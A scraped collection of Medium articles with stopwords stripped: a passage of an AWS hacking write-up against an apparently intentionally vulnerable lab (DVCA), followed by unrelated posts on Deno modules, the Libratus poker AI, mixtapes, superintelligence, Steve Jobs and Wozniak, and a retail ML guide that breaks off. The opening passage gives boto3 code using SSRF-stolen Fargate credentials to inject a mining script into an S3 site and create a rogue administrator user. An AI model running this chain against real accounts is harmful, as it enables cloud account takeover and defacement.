AWSCONTAINERCREDENTIALSRELATIVEURI variable Abusing IAM Services SSRFs Since STS service available normal HTTP endpoint trick Fargate backend making arbitrary request endpoint Frontend happily display result u couldwe find credential UUID needed request Well SSRF story showed read file using file scheme assuming backend Linuxbased server read environment variable pointing request fileprocselfenviron relative URL retrieving credential including UUID found procselfenviron Yay use URI retrieve credential Credentials retrieved SSRF request Using credential order use credential creative manner would suggest use boto3 Python SDK interacting AWS Api Upon creating boto3 client object constructor accepts credential parameter pas received SSRF stsclient boto3client sts awsaccesskeyidaccesskey awssecretaccesskeysecretkey awssessiontokensessiontoken sure credential work effectively elevated privilege STS service AWS equivalent whoami command getcalleridentity Let’s verify printstsclientgetcalleridentityArn arnawssts0123456789assumedroleDVCAFargateBackendDVCATaskRoleCLOUDFORMATIONIDSOMEUUID Bingo laptop considered AWS like Fargate backend application meaning access everything access Reagarding S3 example backend ECS Task set permission defined Effect Allow Action s3GetObject s3PutObject s3ListBucket Resource Tip Try never wildcard access resource domain name DVCA “root” domain subdomain chance underlying S3 Bucket name domain name way Route53 Alias Records make easier work way use modify static website inject rogue mining script example effectively defacing static S3 website s3client boto3client s3 awsaccesskeyidaccesskey awssecretaccesskeysecretkey awssessiontokensessiontoken s3clientputobjectBodyroguebytes Bucketdomainname Keyindexhtml Also note s3ListBucket permission also enables serverless equivalent directory listing… Taking Let’s say Web Application right create role role customer example permission implemented Effect Allow Action iam Living dangerously Resource dangerous sure plenty way permissive implementation wild sake simplicity Using credential retrieved SSRF technique passing boto3 able create new Global Administrator user create Access Keys line python iamclient boto3client iam awsaccesskeyidaccesskey awssecretaccesskeysecretkey awssessiontokensessiontoken iamclientcreateuser UserNameDVCARogueUser iamclientattachuserpolicy PolicyArnarnawsiamawspolicyAdministratorAccess UserNameDVCARogueUser keyresponse iamclientcreateaccesskeyUserNameDVCARogueUser example key keyresponse object printout point basically everything account rogue administrator user created using backend’s credential Future work Lambda Backend Even though included serverless Lambda backend DVCA able exploit yet case credential injected directly Pythons osenviron part procselfenviron procselftask1environ know injected bootstrap using lambdaruntimereceivestart sure anywhere found filesystem AWS Lambdas also metadata endpoint could fetch next hypothesis would try retrieve memory looking procselfmap file idea drop comment Happy hacking Tags Information Security Hacking AWS Cloud Computing Cloudformation
3,882
Using node modules in Deno
Photo by frank mckenna on Unsplash Using node modules in Deno A bad practice but sometimes there is no alternative. Last time we introduced about Deno and discussed how it compares to node, like node, Deno is a server side code-execution environment based on web technology. Node uses JavaScript with commonjs modules and npm/yarn as it’s package manager. Deno uses Typescript or JavaScript with modern javascript import statements. It does not need a package manager. To import a module as usual in deno you reference it by URL: import { serve } from "https://deno.land/std/http/server.ts"; You can find many of the modules you may need in the Deno standard library or in the Deno third party modules list but they don’t have everything. Sometimes you need to use a module which the maintainers have only made available through the npm ecosystem. Here are some methods from most convenient to least: 1. If the module already uses ES modules import/export syntax. The libraries you use from deno don’t have to come from the recommended Deno packages they can come from any URL, provided they use the modern import syntax. Using unpkg is a great way to access these files directly from inside an npm repo. import throttle from https://unpkg.com/[email protected]/throttle.js 2. If the module itself doesn’t use imports but the source code does If the module is compiled or in the wrong format though npm you may still have some luck if you take a look at the source code. Many popular libraries have moved away from using commonjs in their source code to the standards compliant es module import syntax. Some packages have a separate src/ and dist/ directory where the esmodule style code is in src/ which isn’t included in the package available through npm. In that case you can import from the source directly. import throttle from "https://raw.githubusercontent.com/lodash/lodash/master/throttle.js"; I got this URL by clicking on the “raw” button on github to get the raw JS file. It’s probably neater to use a github cdn or to see if the file is available through github pages, but this works. NB: Some libraries use esmodules with webpack, or a module loader which lets them import from node modules like this: Bad: import { someFunction } from "modulename"; import { someOtherFunction } from "modulename/file.js"; The standard for imports is that they need to start with ./ or be a URL to work Good: import { someOtherFunction } from "./folder/file.js"; In that situation try the next method: 3. Importing commonjs modules Fortunately there is a service called JSPM which will resolve the 3rd party modules and compile the commonjs modules to work as esmodule imports. This tool is for using node modules in the browser without a build step. But we can use it here too. The JSPM logo In my most recent project i wanted to do push notifications, which involves generating the credentials for VAPID, there is a deno crypto library which can do encryption but doing the full procedure is difficult and I’d rather use the popular web-push library. I can import it using the JSPM CDN using the URL like below: import webPush from "https://dev.jspm.io/web-push"; I can now use it like any other module in deno. This almost worked 100% some of the bits which relied on specific node behaviors such as making network requests failed in this situation I had to work around this to use the standardised fetch API deno uses. Getting Typescript types working One nice feature of typescipt, which deno uses, is that it provides really good autocomplete for modules. The deno extension for my editor even can autocomplete for third part modules if it knows the type definitions. This isn’t essential to getting the code to work but can provide huge benefits for helping you maintain your code. When I was importing another module called fast-xml-parser when I was looking through the source code I noticed it had a type definitions file which is a file which ends in .d.ts . These files describe the various interfaces and even work for even for JavaScript .js files. You can sometimes also find the type definitions files in the @types\somemodule repo. Using this file typescript can auto complete on things imported from JavaScript files. Even for files imported using JSPM: // Import the fast-xml-parser library import fastXMLParser from "https://dev.jspm.io/fast-xml-parser"; // Import the type definition file from the source code of fast-xml-parser import * as FastXMLParser from "https://raw.githubusercontent.com/NaturalIntelligence/fast-xml-parser/master/src/parser.d.ts"; // Use the parser with the types const parser = fastXMLParser as typeof FastXMLParser; I import the type definitions from the definition files as FastXMLParser (note the uppercase F) this doesn’t contain any working code but is an object which has the same type as the code we want to import. I import the code from JSPM as fastXMLParser (lowercase f) which is the working code but has no types. Next I combine them together to make parser which is fastXMLParser with the type of FastXMLParser . Thank you for reading, I hope you give deno a go. The ability to use any module made for the web and even some which were made for node/npm really gives this new server side library ecosystem a good foundation to get started from. 🦕
https://medium.com/samsung-internet-dev/using-node-modules-in-deno-2885600ed7a9
['Ada Rose Cannon']
2020-08-03 12:14:52.404000+00:00
['Deno', 'Nodejs', 'JavaScript', 'Samsung Internet', 'Web Development']
Title Using node module DenoContent Photo frank mckenna Unsplash Using node module Deno bad practice sometimes alternative Last time introduced Deno discussed compare node like node Deno server side codeexecution environment based web technology Node us JavaScript commonjs module npmyarn it’s package manager Deno us Typescript JavaScript modern javascript import statement need package manager import module usual deno reference URL import serve httpsdenolandstdhttpserverts find many module may need Deno standard library Deno third party module list don’t everything Sometimes need use module maintainer made available npm ecosystem method convenient least 1 module already us ES module importexport syntax library use deno don’t come recommended Deno package come URL provided use modern import syntax Using unpkg great way access file directly inside npm repo import throttle httpsunpkgcomlodash41719throttlejs 2 module doesn’t use import source code module compiled wrong format though npm may still luck take look source code Many popular library moved away using commonjs source code standard compliant e module import syntax package separate src dist directory esmodule style code src isn’t included package available npm case import source directly import throttle httpsrawgithubusercontentcomlodashlodashmasterthrottlejs got URL clicking “raw” button github get raw JS file It’s probably neater use github cdn see file available github page work NB library use esmodules webpack module loader let import node module like Bad import someFunction modulename import someOtherFunction modulenamefilejs standard import need start URL work Good import someOtherFunction folderfilejs situation try next method 3 Importing commonjs module Fortunately service called JSPM resolve 3rd party module compile commonjs module work esmodule import tool using node module browser without build step use JSPM logo recent project wanted push notification involves generating credential VAPID deno crypto library encryption full procedure difficult I’d rather use popular webpush library import using JSPM CDN using URL like import webPush httpsdevjspmiowebpush use like module deno almost worked 100 bit relied specific node behavior making network request failed situation work around use standardised fetch API deno us Getting Typescript type working One nice feature typescipt deno us provides really good autocomplete module deno extension editor even autocomplete third part module know type definition isn’t essential getting code work provide huge benefit helping maintain code importing another module called fastxmlparser looking source code noticed type definition file file end dts file describe various interface even work even JavaScript j file sometimes also find type definition file typessomemodule repo Using file typescript auto complete thing imported JavaScript file Even file imported using JSPM Import fastxmlparser library import fastXMLParser httpsdevjspmiofastxmlparser Import type definition file source code fastxmlparser import FastXMLParser httpsrawgithubusercontentcomNaturalIntelligencefastxmlparsermastersrcparserdts Use parser type const parser fastXMLParser typeof FastXMLParser import type definition definition file FastXMLParser note uppercase F doesn’t contain working code object type code want import import code JSPM fastXMLParser lowercase f working code type Next combine together make parser fastXMLParser type FastXMLParser Thank reading hope give deno go ability use module made web even made nodenpm really give new server side library ecosystem good foundation get started 🦕Tags Deno Nodejs JavaScript Samsung Internet Web Development
3,883
Poker? Done that. Now the next challenge…
IMAGE: Yuriy Davats — 123RF Poker, as has previously happened to chess and Go, has joined the games that a set of algorithms is already capable of playing better than the human champions can manage. On January 31, after twenty days of Heads Up, No Limit Texas Hold ’em, four people considered among the best professional poker players in the world were defeated by an artificial intelligence machine, Libratus, the product of the work of researchers of Carnegie Mellon directed by Tuomas Sandholm. Twenty days watching computer screens, playing about 120,000 hands, and meeting at night in their hotel rooms to coordinate joint strategies were not enough to beat an algorithm that quickly understood the strategies employed by humans and it soon overcame them. The game was clearly dominated by Libratus from the first moment: the human players were not even close to winning at any time. The aim of keeping the championship going to the end was to achieve a victory that could be considered statistically significant, that is to say, winning 99.7% of the time is hardly the product of chance. What really matters here is that the algorithms used were not specific to the game of poker, nor did they try to exploit the mistakes of the Libratus’s opponents. They simply took the rules of the game as their inputs and focused on improving their own strategy by taking into account the cards dealt, those on the table and the bets placed by each player. Texas Hold ’em, with its unlimited betting and the uncertainty of two hidden cards on whose potential values player speculate, offers a very good example of imperfect information play, and serves as an appetizer for other non-gambling activities such as negotiation, cybersecurity, finance, or even research on antiviral treatments (taking the mutations of the virus, whose genetic sequence is known, as uncertain variables that allow it to survive certain drugs). There are plenty of areas similar to poker: we’re no longer speaking about a machine that can learn the rules of a game and apply computational brute force to calculate. What Libratus’s victory means in simple terms is that artificial intelligence is better at making strategic decisions based on uncertain information than humans are. If you thought that a machine was only capable of repeating what it had been programmed to do, think again: a machine has been able to analyze 120,000 poker moves and, given the cards dealt it, the cards already on the table and the bets of each of its opponents, consistently won on a statistically significant number of occasions, enough to rule out luck or chance. So next time you sit down to play a hand of poker, remember that no matter how well you do, there is a machine out there that will always beat you. And from now on, that won’t just apply to card games…
https://medium.com/enrique-dans/poker-done-that-now-the-next-challenge-330b67b11a28
['Enrique Dans']
2017-02-02 22:29:22.028000+00:00
['AI', 'Poker', 'Algorithms', 'Artificial Intelligence', 'Machine Learning']
Title Poker Done next challenge…Content IMAGE Yuriy Davats — 123RF Poker previously happened chess Go joined game set algorithm already capable playing better human champion manage January 31 twenty day Heads Limit Texas Hold ’em four people considered among best professional poker player world defeated artificial intelligence machine Libratus product work researcher Carnegie Mellon directed Tuomas Sandholm Twenty day watching computer screen playing 120000 hand meeting night hotel room coordinate joint strategy enough beat algorithm quickly understood strategy employed human soon overcame game clearly dominated Libratus first moment human player even close winning time aim keeping championship going end achieve victory could considered statistically significant say winning 997 time hardly product chance really matter algorithm used specific game poker try exploit mistake Libratus’s opponent simply took rule game input focused improving strategy taking account card dealt table bet placed player Texas Hold ’em unlimited betting uncertainty two hidden card whose potential value player speculate offer good example imperfect information play serf appetizer nongambling activity negotiation cybersecurity finance even research antiviral treatment taking mutation virus whose genetic sequence known uncertain variable allow survive certain drug plenty area similar poker we’re longer speaking machine learn rule game apply computational brute force calculate Libratus’s victory mean simple term artificial intelligence better making strategic decision based uncertain information human thought machine capable repeating programmed think machine able analyze 120000 poker move given card dealt card already table bet opponent consistently statistically significant number occasion enough rule luck chance next time sit play hand poker remember matter well machine always beat won’t apply card games…Tags AI Poker Algorithms Artificial Intelligence Machine Learning
3,884
The Mixtape for Indie Rock Lovers Vol. 1
The Mixtape for Indie Rock Lovers Vol. 1 Rewind. Record. Repeat. As a late 80’s kid, the joy of discovering new music through hand-crafted compilations were easily shared through mixtapes. And even though I missed a portion of that era, I still remember running to my cassette player to hit record only to find out later that the first 30 seconds were missing. When cassette tapes became a thing of the past — CD burners made its way to the music scene and of course, I was pretty stoked in making my first mix. There was an art to crafting our own playlists that we could hand out to our friends, and accessing music through Spotify just doesn’t have the same je ne sais quoi. Before we get started, I just want to let you know that I spiralled down a black hole trying to define the term indie rock — which lead me to creating a lengthy article explaining the history behind it. Despite the slight distinctions in origins, calling this an “alternative” playlist could have been a better option. But in retrospect, creating my own sub-genres was a more exciting idea.
https://medium.com/narrative/the-mixtape-for-indie-rock-lovers-vol-1-e89a6cfddbbc
['Katy Velvet']
2019-05-04 06:40:20.985000+00:00
['Inspiration', 'Culture', 'Ideas', 'Creativity', 'Music']
Title Mixtape Indie Rock Lovers Vol 1Content Mixtape Indie Rock Lovers Vol 1 Rewind Record Repeat late 80’s kid joy discovering new music handcrafted compilation easily shared mixtapes even though missed portion era still remember running cassette player hit record find later first 30 second missing cassette tape became thing past — CD burner made way music scene course pretty stoked making first mix art crafting playlist could hand friend accessing music Spotify doesn’t je ne sais quoi get started want let know spiralled black hole trying define term indie rock — lead creating lengthy article explaining history behind Despite slight distinction origin calling “alternative” playlist could better option retrospect creating subgenres exciting ideaTags Inspiration Culture Ideas Creativity Music
3,885
Superintelligence Vs. You
Supposedly atheist intellectuals are now spending a lot of time arguing over the consequences of creating “God.” Often they refer to this supreme being as a “superintelligence,” an A.I. that, in their thought experiments, possesses magical traits far beyond just enhanced intelligence. Any belief system needs a positive and negative aspect, and for this new religion-replacement, the “hell” scenario is that this superintelligence we cannot control might decide to conquer and destroy the world. Like their antecedents—Hegel, Marx, J.S. Mill, Fukayama, and many others—these religion-replacement proposers view history as a progression toward some endpoint (often called a “singularity”). This particular eschaton involves the creation of a superintelligence that either uplifts us or condemns us. The religious impulse of humans—the need to attribute purpose to the universe and history—is irrepressible even among devoted atheists. And, unfortunately, this worldview has been taken seriously by normally serious thinkers. I and others have argued that rather than new technologies leading to some sort of end-of-history superintelligence, it’s much more likely that a “tangled bank” of all sorts of different machine intelligences will emerge: some small primitive A.I.s that mainly filter spam from email, some that drive, some that land planes, some that do taxes, etc. Some of these will be much more like individual cognitive modules, others more complex, but they will exist, like separate species, adapted to a particular niche. As with biological life, they will bloom across the planet in endless forms, most beautiful. This view is a lot closer to what’s actually happening in machine learning on a day-to-day basis. Evolution is an endless game that’s fundamentally nonprogressive. The logic behind this tangled bank is based on the fundamental limits of how you can build an intelligence as an integrated whole. Just like evolution, no intelligence can be good at solving all classes of problems. Adaptation and specialization are necessary. It’s this fact that ensures evolution is an endless game and makes it fundamentally nonprogressive. Organisms adapt to an environment, but that environment changes, maybe even due to that organism’s adaptation, and so on, for however long there is life. Put another way: Being good at some things makes it harder to do others, and no entity is good at everything. In a nonprogressive view, intelligence is, from a global perspective, very similar to fitness. Becoming more intelligent at X often makes you worse at Y, and so on. This ensures that intelligence, just like life, has no fundamental endpoint. Human minds struggle with this view because without an endpoint there doesn’t seem to be much of a point either. Despite the probable incoherence of a true superintelligence (all knowing, all seeing, etc.), some argue that, because we don’t fully know the formal constraints on building intelligences, it may be possible to build something that’s superintelligent in comparison to us and that operates over a similar class of problems. This more nuanced view argues that it might be possible to build something more intelligent than a human over precisely the kinds of domains humans are good at. This is kind of like an organism outcompeting another organism for the same niche. Certainly this isn’t in the immediate future. But let’s assume, in order to show that concerns about the creation of superintelligence as a world-ending eschaton are overblown, that it is indeed possible to build something 1,000x smarter than a human across every problem-solving domain we engage in. Even if that superintelligence were created tomorrow, I wouldn’t be worried. Such worries are based on a kind of Doctor Who-esque being. A being that, in any circumstance, can find some advantage via pure intelligence that enables victory to be snatched from the jaws of defeat. A being that, even if put in a box buried underground, would, just like Doctor Who, always be able to use its intelligence to both get out of the box and go on to conquer the entire world. Let’s put aside the God-like magical powers often granted superintelligences—like the ability to instantaneously simulate others’ consciousnesses just by talking to them or the ability to cure cancer without doing any experiments (you cannot solve X just by being smart if you don’t have sufficient data about X; ontology simply doesn’t work that way)—and just assume it’s merely a superintelligent agent lacking magic. The important thing to keep in mind is that Doctor Who is able to continuously use intelligence to solve situations because the show writers create it that way. The real world doesn’t constantly have easy shortcuts available; in the real world of chaotic dynamics and P!=NP and limited data, there aren’t orders-of-magnitude more efficient solutions to every problem in the human domain of problems. And it’s not that we fail to identify these solutions because we lack the intelligence. It’s because they don’t exist. An example of this is how often superintelligence can be beaten by a normal human at all sorts of tasks, given either the role of luck or small asymmetries between the human and the A.I. For example, imagine you are playing chess against a superintelligence of the 1,000x-smarter-than-humans-across-all-human-problem-solving-domains variety. If you’re one of the best chess-players in the world, you could at most hope for a tie, although you may never get one. Now let’s take pieces away from the superintelligence, giving it just pawns and its king. Even if you are, like me, not well-practiced at chess, you could easily defeat it. This is simply a no-win scenario for the superintelligence, as you crush it on the board, mercilessly trading piece for piece, backing it into a corner, finally toppling its king. That there are natural upper bounds on performance from being intelligent isn’t some unique property of chess and its variants. In fact, as strategy games get more complex, intelligence often matters less. Because the game gets chaotic, predictions are inherently less precise due to amplifying noise, available data for those predictions becomes more limited, and brute numbers, positions, resources, etc., begin to matter more. Let’s bump the complexity of the game you’re playing against the superintelligence up to the computer strategy game Starcraft. Again, assuming both players start perfectly equal, let’s grant the superintelligence an easy win. But, in this case, it would take only a minor change in the initial conditions to make winning impossible for the superintelligence. Tweaking, say, starting resources would put the superintelligence into all sorts of no-win scenarios against even a mediocre player. Even just delaying the superintelligence from starting the game by 30 seconds would probably be enough for great human players to consistently win. You can give the superintelligence whatever properties you want—maybe it thinks 1,000x faster than a human. But its game doesn’t run 1,000x faster, and by starting 30 seconds earlier, the human smokes it. Intelligence is only one of many things that affect the outcome of even the most strategic games — and often not a very important one. The point is that our judgments on how effective intelligence alone is for succeeding at a given task are based on situations when all other variables are fixed. Once you start manipulating those variables, instead of controlling for them, you see that intelligence is only one of many things that affect the outcome of even the most strategic games—and often not a very important one. We can think of a kind of ultimate strategy game called Conquer the World. You’re born into this world with whatever resources you start with, and you, a lone agent, must conquer the entire earth and all its nations, without dying. I hate to break it to you: There’s no way to consistently win this game. It’s not just because it’s a hard game. It’s because there is no way to consistently win this game, no matter your intelligence or strategy—it just doesn’t exist. The real world doesn’t have polarity reversals and there are many tasks with no shortcuts. The great whirlwind of limbs, births, deaths, careers, lovers, companies, children, consumption, nations, armies—that is, the great globe-spanning multitudinous mass that is humanity—has so many resources and numbers and momentum it is absurd to think that any lone entity could, by itself, ever win a war against us, no matter how intelligent that entity was. It’s like a Starcraft game where the superintelligence starts with one drone and we start with literally the entire map covered by our bases. It doesn’t matter how that drone behaves, it’s just a no-win scenario. Barring magical abilities, a single superintelligence, with everything beyond its senses hidden in the fog of war, with limited data, dealing with the exigencies and chaos and limitations that define the physical world, is in a no-win scenario against humanity. And a superintelligence, if it’s at all intelligent, would know this. Of course, no thought experiment or argument is going to convince someone out of a progressive account of history, particularly if the progressive account operates to provide morality, structure, and meaning to what would otherwise be a cold and empty universe. Eventually the workers must rise up, or equality for all must be achieved, or the chosen nation-state must bestride the world, or we must all be uplifted into a digital heaven or thrown into oblivion. To think otherwise is almost impossible. Human minds need a superframe that contains all others, that endows them with meaning, and it’s incredibly difficult to operate without one. This “singularity” is as good as any other, I suppose. Humans just don’t do well with nonprogressive processes. The reason it took so long to come up with the theory of evolution by natural selection, despite its relatively simple logic and armchair-derivability, is its nonprogressive nature. These are things without linear frames, without beginnings or ends or reasons why. When I was studying evolutionary theory back in college, I remember at one moment feeling a dark logic click into place: Life was inevitable, design inevitable, yet it needed no watchmaker and had no point, and that this pointlessness was the reason why I was, why everyone was. But such a thought is slippery, impossible to hold onto for a human, to really keep believing in the trenches of the everyday. And so, when serious thinkers fall for silly thoughts about history coming to an end, we shouldn’t judge. Each of us, after all, engages in such silliness every morning when we get out of bed.
https://medium.com/s/story/superintelligence-vs-you-1e4a77177936
['Erik Hoel']
2019-02-05 22:18:39.533000+00:00
['Machine Learning', 'Technology', 'Artificial Intelligence', 'Robots', 'Future']
Title Superintelligence Vs YouContent Supposedly atheist intellectual spending lot time arguing consequence creating “God” Often refer supreme “superintelligence” AI thought experiment posse magical trait far beyond enhanced intelligence belief system need positive negative aspect new religionreplacement “hell” scenario superintelligence cannot control might decide conquer destroy world Like antecedents—Hegel Marx JS Mill Fukayama many others—these religionreplacement proposer view history progression toward endpoint often called “singularity” particular eschaton involves creation superintelligence either uplift u condemns u religious impulse humans—the need attribute purpose universe history—is irrepressible even among devoted atheist unfortunately worldview taken seriously normally serious thinker others argued rather new technology leading sort endofhistory superintelligence it’s much likely “tangled bank” sort different machine intelligence emerge small primitive AIs mainly filter spam email drive land plane tax etc much like individual cognitive module others complex exist like separate specie adapted particular niche biological life bloom across planet endless form beautiful view lot closer what’s actually happening machine learning daytoday basis Evolution endless game that’s fundamentally nonprogressive logic behind tangled bank based fundamental limit build intelligence integrated whole like evolution intelligence good solving class problem Adaptation specialization necessary It’s fact ensures evolution endless game make fundamentally nonprogressive Organisms adapt environment environment change maybe even due organism’s adaptation however long life Put another way good thing make harder others entity good everything nonprogressive view intelligence global perspective similar fitness Becoming intelligent X often make worse ensures intelligence like life fundamental endpoint Human mind struggle view without endpoint doesn’t seem much point either Despite probable incoherence true superintelligence knowing seeing etc argue don’t fully know formal constraint building intelligence may possible build something that’s superintelligent comparison u operates similar class problem nuanced view argues might possible build something intelligent human precisely kind domain human good kind like organism outcompeting another organism niche Certainly isn’t immediate future let’s assume order show concern creation superintelligence worldending eschaton overblown indeed possible build something 1000x smarter human across every problemsolving domain engage Even superintelligence created tomorrow wouldn’t worried worry based kind Doctor Whoesque circumstance find advantage via pure intelligence enables victory snatched jaw defeat even put box buried underground would like Doctor always able use intelligence get box go conquer entire world Let’s put aside Godlike magical power often granted superintelligences—like ability instantaneously simulate others’ consciousness talking ability cure cancer without experiment cannot solve X smart don’t sufficient data X ontology simply doesn’t work way—and assume it’s merely superintelligent agent lacking magic important thing keep mind Doctor able continuously use intelligence solve situation show writer create way real world doesn’t constantly easy shortcut available real world chaotic dynamic PNP limited data aren’t ordersofmagnitude efficient solution every problem human domain problem it’s fail identify solution lack intelligence It’s don’t exist example often superintelligence beaten normal human sort task given either role luck small asymmetry human AI example imagine playing chess superintelligence 1000xsmarterthanhumansacrossallhumanproblemsolvingdomains variety you’re one best chessplayers world could hope tie although may never get one let’s take piece away superintelligence giving pawn king Even like wellpracticed chess could easily defeat simply nowin scenario superintelligence crush board mercilessly trading piece piece backing corner finally toppling king natural upper bound performance intelligent isn’t unique property chess variant fact strategy game get complex intelligence often matter le game get chaotic prediction inherently le precise due amplifying noise available data prediction becomes limited brute number position resource etc begin matter Let’s bump complexity game you’re playing superintelligence computer strategy game Starcraft assuming player start perfectly equal let’s grant superintelligence easy win case would take minor change initial condition make winning impossible superintelligence Tweaking say starting resource would put superintelligence sort nowin scenario even mediocre player Even delaying superintelligence starting game 30 second would probably enough great human player consistently win give superintelligence whatever property want—maybe think 1000x faster human game doesn’t run 1000x faster starting 30 second earlier human smoke Intelligence one many thing affect outcome even strategic game — often important one point judgment effective intelligence alone succeeding given task based situation variable fixed start manipulating variable instead controlling see intelligence one many thing affect outcome even strategic games—and often important one think kind ultimate strategy game called Conquer World You’re born world whatever resource start lone agent must conquer entire earth nation without dying hate break There’s way consistently win game It’s it’s hard game It’s way consistently win game matter intelligence strategy—it doesn’t exist real world doesn’t polarity reversal many task shortcut great whirlwind limb birth death career lover company child consumption nation armies—that great globespanning multitudinous mass humanity—has many resource number momentum absurd think lone entity could ever win war u matter intelligent entity It’s like Starcraft game superintelligence start one drone start literally entire map covered base doesn’t matter drone behaves it’s nowin scenario Barring magical ability single superintelligence everything beyond sens hidden fog war limited data dealing exigency chaos limitation define physical world nowin scenario humanity superintelligence it’s intelligent would know course thought experiment argument going convince someone progressive account history particularly progressive account operates provide morality structure meaning would otherwise cold empty universe Eventually worker must rise equality must achieved chosen nationstate must bestride world must uplifted digital heaven thrown oblivion think otherwise almost impossible Human mind need superframe contains others endows meaning it’s incredibly difficult operate without one “singularity” good suppose Humans don’t well nonprogressive process reason took long come theory evolution natural selection despite relatively simple logic armchairderivability nonprogressive nature thing without linear frame without beginning end reason studying evolutionary theory back college remember one moment feeling dark logic click place Life inevitable design inevitable yet needed watchmaker point pointlessness reason everyone thought slippery impossible hold onto human really keep believing trench everyday serious thinker fall silly thought history coming end shouldn’t judge u engages silliness every morning get bedTags Machine Learning Technology Artificial Intelligence Robots Future
3,886
Steve Jobs’ Dark Past
Steve Jobs’ Dark Past The time Steve Job’s cheated his way to success Steve Wozniak Atari and Steve Jobs Image source: (Photo by Reuters) Steve Wozniak on Breakout, Atari and Steve Jobs I believe that most people have a dark past, a past that they wish won’t come to light, but sooner or later you have to take that pressure off your chest and come clean. This is what Steve Jobs did about the fact of how he tricked his best friend into working all night long for several days and then cheating him out of his paycheck. This proved to be only the first offense in a long litany of his penchant for pettiness and pointless cruelty. The friend that I am talking about is Steve Wozniak, him and Jobs were working at Atari, one of the first video game consoles which revolutionized the video game market. The owner of Atari at the time was its actual founder by the name of Nolan Bushnell. The first game that came out was “Pong,” a classic which many people remember. Due to its high success, Bushnell thought of making a sequel that would be only a single-player and call it “Breakout” in 1975. Appearances can be deceiving For this project, Bushnell was thinking of tasking Steve Jobs to be in charge and take care of the project. Jobs was considered (at the time) a low-level Atari technician with huge potential. As this game was expected to be much better than its predecessor, Jobs recruited Steve Wozniak, who was known on the market as the better engineer. Jobs and Wozniak had been friends for quite some time at that point. They both were working towards the Apple 1 which would follow to become the most iconic computer around the world for four long years so they got to spend a lot of time together. The way that Atari worked was by offering a monetary bonus for every chip fewer than fifty that was used when building a game. Wozniak was ecstatic when Jobs asked him to help with this big project. This is when Jobs started to lie to Wozniak in order to use him for his expertise. He told Wozniak that the deadline was four days and that he had to use as few chips as possible. The truth is that Jobs was given a whole month for this project, not four days. Jobs never told Wozniak about the bonus for using fewer chips and the four-day deadline was self-imposed by Jobs, as he needed to get back to his commune farm to help bring in the apple harvest. It is imperative to mention (for those who are not aware) that Steve Jobs came from a very poor background. Wozniak was working for Hewlett-Packard at the time as well, so he had to balance his main job as well as this project. So he would end up going to his job in the day time and spending most of the night working on “Breakout”. The only thing that Steve did was implementing the required chips, making sure that there were less than fifty chips. Their herculean efforts succeeded, as they finished the game in four days and only using forty-five chips. When payday came, Steve Jobs only gave Wozniak half the pay, he kept the rest of his pay as well as the bonus for himself. Wozniak only found out about this ten years later. He is quoted in the Isaacson biography Steve Jobs: “When he talks about it now, there are long pauses, and he admits it causes him pain.” “I wish he had just been honest. If he had told me he needed the money, he should have known I would have just given it to him. He was a friend. You help your friends.” “Ethics always mattered to me, and I still don’t understand why he would have gotten paid one thing and told me he’d gotten paid another. But, you know, people are different.” Quotes are taken from Steve Jobs: The Exclusive Biography by Walter Isaacson Wozniak, to his credit, did not hold this against Jobs in later years. The reason why Jobs did this is unknown to the public, many think it was his need for money to keep on working at the Apple 1 computer, whilst others say that those are his true colors. I am not here to judge Steve Jobs as I believe we all, at some point in time, chose the wrong path, especially in our younger years.
https://medium.com/history-of-yesterday/steve-jobss-dark-past-55a98044f3b4
['Andrei Tapalaga']
2020-11-06 14:21:13.517000+00:00
['History', 'Marketing', 'Business', 'Life Lessons', 'Entrepreneurship']
Title Steve Jobs’ Dark PastContent Steve Jobs’ Dark Past time Steve Job’s cheated way success Steve Wozniak Atari Steve Jobs Image source Photo Reuters Steve Wozniak Breakout Atari Steve Jobs believe people dark past past wish won’t come light sooner later take pressure chest come clean Steve Jobs fact tricked best friend working night long several day cheating paycheck proved first offense long litany penchant pettiness pointless cruelty friend talking Steve Wozniak Jobs working Atari one first video game console revolutionized video game market owner Atari time actual founder name Nolan Bushnell first game came “Pong” classic many people remember Due high success Bushnell thought making sequel would singleplayer call “Breakout” 1975 Appearances deceiving project Bushnell thinking tasking Steve Jobs charge take care project Jobs considered time lowlevel Atari technician huge potential game expected much better predecessor Jobs recruited Steve Wozniak known market better engineer Jobs Wozniak friend quite time point working towards Apple 1 would follow become iconic computer around world four long year got spend lot time together way Atari worked offering monetary bonus every chip fewer fifty used building game Wozniak ecstatic Jobs asked help big project Jobs started lie Wozniak order use expertise told Wozniak deadline four day use chip possible truth Jobs given whole month project four day Jobs never told Wozniak bonus using fewer chip fourday deadline selfimposed Jobs needed get back commune farm help bring apple harvest imperative mention aware Steve Jobs came poor background Wozniak working HewlettPackard time well balance main job well project would end going job day time spending night working “Breakout” thing Steve implementing required chip making sure le fifty chip herculean effort succeeded finished game four day using fortyfive chip payday came Steve Jobs gave Wozniak half pay kept rest pay well bonus Wozniak found ten year later quoted Isaacson biography Steve Jobs “When talk long pause admits cause pain” “I wish honest told needed money known would given friend help friends” “Ethics always mattered still don’t understand would gotten paid one thing told he’d gotten paid another know people different” Quotes taken Steve Jobs Exclusive Biography Walter Isaacson Wozniak credit hold Jobs later year reason Jobs unknown public many think need money keep working Apple 1 computer whilst others say true color judge Steve Jobs believe point time chose wrong path especially younger yearsTags History Marketing Business Life Lessons Entrepreneurship
3,887
Complete guide to machine learning and deep learning in retail
Complete guide to machine learning and deep learning in retail The stores aren’t dead yet Stores are changing. We see it happening before our eyes, even if we don’t always realize it. Little by little, they are becoming just one extra step in an increasingly complex customer journey. Thanks to digitalisation and retail automation, the store is no longer an end in itself, but a mean of serving the needs of the brand at large. The quality of the experience, a feeling of belonging and recognition, the comfort of the purchase… all these parameters now matter as much as sales per square meter, and must therefore submit themselves to the optimizations prescribed by Data Science and its “intelligent algorithms” (aka artificial Intelligence in the form of machine learning and deep learning). The use of artificial intelligence is, above all, a competitive necessity. Indeed, e-commerce players did not wait on anyone: note, for example, the adaptation of online search results to the end customer, or the recommendations made based on a digital profile. These two aspects are impossible for brick and mortar (for now). However, physical commerce has its own strengths. Olfactory, visual, auditory, etc. data can be used to give the consumer a feeling of having experienced something unique and made specifically for them. In addition to customer relationship improvements, artificial intelligence also makes it possible to seek the resolution of problems that have long represented a burden for retailers : better inventory management, optimization of store space, optimization of employee time… We present below a complete look at deep learning/ machine learning use cases implemented to create the store of the future, supported by real-life examples. 1. Adapting the store and its inventory to better serve customers It’s a known fact that e-commerce actors can optimize their websites in real time using dynamic statistics. This allows them to define the most effective strategies according to the resources available and predefined customers segmentation. Like any physical space, the store does not have this luxury. However, this does not prevent the periodic optimization of physical spaces, thanks to insights 